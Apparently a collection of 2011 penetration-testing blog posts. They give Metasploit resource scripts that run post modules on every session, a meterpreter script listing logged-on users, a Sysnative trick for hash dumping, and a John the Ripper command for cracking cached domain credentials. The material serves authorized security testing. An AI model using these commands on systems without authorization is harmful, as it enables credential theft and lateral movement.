This Christmas I’ve decided to spread a little cheer (aka free stuff) ;–) , and I’m doing it in 2600 fashion. Now, I don’t know if I have enough readers to pull this off, but here goes:

I will be sending 1 No Starch book of the winner’s choice each day for 12 days starting on December 1st. Here’s the catch. To win the books you must submit a picture of a door or room that is unmistakably ‘Room 362’. The only other stipulation is that the image must be original (meaning if I look it up on TinEye it doesn’t come back with any hits).

Once you win you’ll be taken out of selection for other chances but if you submit a picture tomorrow you’ll be eligible to win all 12 days. Also, the more original pictures submitted the better chance you have.

How do you submit? Great question. Simply tag Room362’s Google+ page in the photo.

And since Google+’s stupid badges require header changes you can just click on this icon:

This will be paid for out of my own pocket and will be ordered (not second hand from my book shelf), so I may ask you to choose another book if it’s a box set for $200 or something like that.

Why No Starch? Well, I’ll leave that up to you to speculate.

Update on 2011-11-28 00:04 by Rob Fuller

1. Yes, I’m ok with international shipping, but it may not get these before Christmas if it is.

2. Funny, inventive, crazy, artistic, cool, etc are all pluses

Jcran recently blogged about an easy way to run a post module on all sessions:

http://blog.pentestify.com/simple-framework-domain-token-scanner

1
2
3
4
5
6
7

msf> use post/windows/gather/enum_domain_tokens
msf enum_domain_tokens> irb
framework.sessions.each do |session|
  run_single("set SESSION #{session.first}")
  run_single("run")
  sleep 1
end

You use the POST module, drop to IRB and run those 4 lines, and bam, you win. With resource files we can automate this a bit more and have it so that we do this effortlessly with any post module.

Thinking back to http://blog.metasploit.com/2010/03/automating-metasploit-console.html and my rapid file PSEXEC resource file, we know we can run ruby inside of resource files with the tag.

Save the following as runall.rc somewhere where you’ll remember:

1
2
3
4
5
6

framework.sessions.each do |session|
  run_single("set SESSION #{session.first}")
  print_status("Running #{active_module.fullname} against session #{session.first}")
  run_single("run")
  sleep 1
end

Then when you want to run a POST module against every session you have you simply do:

1
2
3

msf> use post/windows/gather/enum_domain_tokens
msf enum_domain_tokens> resource runall.rc
[*] Running post/windows/gather/enum_domain_tokens on session 1

Update on 2011-11-06 20:05 by Rob Fuller

A commenter noticed an error in the coding for cross compatibility. The following should work better across versions:

1
2
3
4
5
6

framework.sessions.each_key do |session|
  run_single("set SESSION #{session}")
  print_status("Running #{active_module.fullname} against session #{session}")
  run_single("run")
  sleep 1
end

In @carnal0wnage and my presentation at DerbyCon 2011 we talked about using SCREEN and SCRIPT to keep connections live / use them across SSH sessions, and log everything that happens. What we didn’t cover is the fact that there isn’t a time stamp for those logs. Now, Metasploit has multiple ways of creating logs:

• cat ~/.msf4/logs/framework.log
  • This log automatically logs all of the error data that is great for trouble shooting when something is working, but doesn’t record what you are doing inside of msfconsole
• msf> spool ~/myclient.log
  • The spool command is great for logging output from anything you do in either consoles or sessions, even when you drop to a shell. My one gripe about this one is that it doesn’t log the actual command you issued. *

1
2
3
4

msf> set ConsoleLogging true  
msf> set LogLevel 5  
msf> set SessionLogging true  
msf> set TimestampOutput true

• These combined essentially do the same thing as spool except that they go into different logs, but do actually log the command you issued

Plenty of logging right? But none of them really ‘log everything’ and time stamps are not a regular occurrence in them. Cool, but we need both. We’ve got the ‘log everything’ with the Linux ‘script’ command, we just need a way to inject time stamps into our log.

Enter the ever mutable ‘msf>’ prompt:

A lesser known variable in MSFConsole is ‘PROMPT’. You can set this pretty much like any other OS can, however there are some metasploit specific things you can add. Using a three letter abbreviation you can even add color to it.

For example lets add our hostname to our prompt:

msf> set PROMPT %H

changes msf> to myhostname>

And you can combine and add things that you wish:

set PROMPT %H Just more text %U

changes the prompt to: myattackmachine Just more text mubix> (%U is username)

For reference here are the other working % variables that I know of:

• %D = Current local directory (not sure if this changes when in meterpreter or not for the victims dir, that would be cool)
• %H = Host name (again, would be cool if this changed when in meterpreter)
• %J = Current number of jobs running
• %L = Local IP (makes it easy to remember what to put in LHOST)
• %S = Currently number of sessions open
• %T = Time stamp
• %U = Username (yes, would be awesome if this changed in meterpreter too)

Now if you wanted to add colors to that, all you would do is use something like %grn%T to make the time stamp green. You’ll have to play around with the color’s names as I don’t know them all. %red %blu %blk etc…

Combine all of that with script and you’ve got something awesome. I set my PROMPT to:

1
2

msf> set PROMPT %T S:%S J:%J
1970-01-01 00:00:00 +0000 S:0 J:0>

This gives me the number of jobs and sessions and has the time stamp every time I throw a command, so in my logs I can very easily narrow down the exact time when I did or didnt’ do something. The number of sessions and jobs are just good to know items.

Throw in one more trick to make the whole thing a cake walk:

In your ~/.msf4 directory, if you haven’t already, create a file called ‘msfconsole.rc’. This magical file will run every time you start msfconsole (with the express exception of when you specify a resource file to run from the command line using the -r argument). Throw your ‘set PROMPT %blah %blah %blah’ in there formatted however you like, and now whenever you start msfconsole you’ll have your handy dandy timestamp.

Shout out to @egyp7 for showing me this.

Video:

Slides:

The Dirty Little Secrets They Didn’t Teach You In Pentesting Class [slideshare id=9530403]

Code:

https://github.com/mubix/Not-In-Pentesting-Class

On Vista and above there is a Windows ‘Redirector’ (A redirector is basically a Symlink or fake directory that’s there but not in Windows) (more info here) that allows a 32bit process create a 64bit one. For anyone who has tried to run ‘execute -H -c -f notepad.exe’, they know that if they are in a 32bit process, they get a 32bit notepad even if they are on a 64bit system, which is annoying. So if you don’t want to read the link above you can create a stable 64bit notepad.exe by doing the following:

execute -H -c -f "C:\\WINDOWS\\Sysnative\\notepad.exe"

Now you can migrate into that notepad, Metasploit/Meterpreter will handle not only the network socket switch but the upgrade to a 64bit process. Now, you should be able to dump hashes like I talked about (here).

Of course you need to change the drive and windows directory to match your target (Language changes and base drive changes apply), but the rest should work as perscribed.

Chris Gates (@carnal0wnage) and I will be speaking at DerbyCon next week:

The Dirty Little Secrets They Didn’t Teach You In Pentesting Class

“This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix. ”

Say you go for the 500+ shells on an internal test or your phishing exersice goes way better than you thought. Well you need to get your bearings quickly and going into each shell and doing a ps, then looking through the list for all the users logged in is a bit of a pain and defintely not ideal.

I wrote a quick script that you can throw in the meterpreter scripts folder to aide you a bit with this:

1
2
3
4
5
6
7
8
9
10
11

users = []
client.sys.process.each_process do |x|
        users << x["user"]
end

users.sort!
users.uniq!
users.delete_if {|x| x =~ /^NT AUTHORITY/}
users.delete_if {|x| x == ""}
loggedin = users.join(', ')
print_status(loggedin)

All it does is automate the process I said above, used in concert with the ‘sessions -s’ command makes life a bit easier:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

msf  post(enum_logged_on) > sessions -s loggedin
[*] Running script loggedin on all sessions...
[*] Session 1 (victimgatewayaddress:21638):
[*] DOMAIN\User1
[*] Session 2 (victimgatewayaddress:39900):
[*] DOMAIN\AdminUser1
[*] Session 3 (victimgatewayaddress:59395):
[*] DOMAIN\User5
[*] Session 5 (victimgatewayaddress:21639):
[*] DOMAIN\User20
[*] Session 6 (victimgatewayaddress:21640):
[*] COMPUTERNAME\Administrator, DOMAIN2\AdminUser7
[*] Session 7 (victimgatewayaddress:39901):
[*] DOMAIN\User55

You can see from this output I probably want to start with session 2, and probably 6 as well as it seems to be on another domain and an admin to boot. The example is small but on a larger scale this can start to be much more important for time management. I’m sure there are some of you out there that realized after spending hours with another session that you had one with a DA signed into it on a different system.

Just a disclaimer, this ONLY shows who is logged into the sessions you have, not remote systems.

This doesn’t really apply to Windows users as you can just close puTTy. But for everyone else, stalled SSH Sessions suck. You are either slamming enter to get it to realize it’s been disconnected or just waiting for it to. Well, for those of us who are impatient just hit:

1

~.

Thats right, SHIFT + the key above TAB, release, and hit the period. You may have to hit ENTER first to clear the buffer or whatever it does, but do that and it will disconnect the SSH session right away.

Stupid trick, but I use it all the time (especially on shotty MiFi connections).

John the ripper only takes one word list at a time. There are plenty of docs out there that show you how to cat all of your dictionaries into John’s stdin function but I like to run rules against my lists and I didn’t see any how-tos on doing this. Here is my way:

ls dicts | xargs -t -I file ./john --pot=victim.pot --format=mscash --wordlist=dicts/file --rules victim_cachedump.txt

This command will ls the ‘dicts’ directory, pipe it to xargs, which will spit out the command it uses for each itteration (-t) and replace every time it see the word file with the line/itteration its on (-I). Then it’s just your standard john arguments.

I’ve had a private list of commands that I run on Windows or Linux when I pop a shell, as I’m sure most pentesters do. It isn’t so much a thing of hoarding as much it is just jumbled notes that are ‘not worth posting’

Well, I made two (now 3) public google docs (anyone can edit) *don’t be a dick clause

Linux/Unix/BSD Post Exploitation: https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit?hl=en_US

Windows Post Exploitation: https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US

OSX Post Exploitation: https://docs.google.com/document/d/10AUm_zUdAQGgoHNo_eS0SO1K-24VVYnulUD2x3rJD3k/edit?hl=en_US

and the newly added Obsucure Syststem’s Post Exploitation: https://docs.google.com/document/d/1CIs6O1kMR-bXAT80U6Jficsqm0yR5dKUfUQgwiIKzgc/edit

and Metasploit Post Exploitation: https://docs.google.com/document/d/1ZrDJMQkrp_YbU_9Ni9wMNF2m3nIPEA_kekqqqA2Ywto/edit

Both have filled out A LOT since I first posted them but if you have that one trick command you’d like to share or just want to copy/print the list for your own uses, thats fine too. I plan to keep these publicly editable as long as people obey the DBAD clause.

If you don’t know any cool commands but happen to be a tech writer and can make it look beautiful, then great! Please do. There are tables at the bottom that I want to move everything to, or something like it, but if you can do it better…

Anyways, look forward to seeing how this thing grows.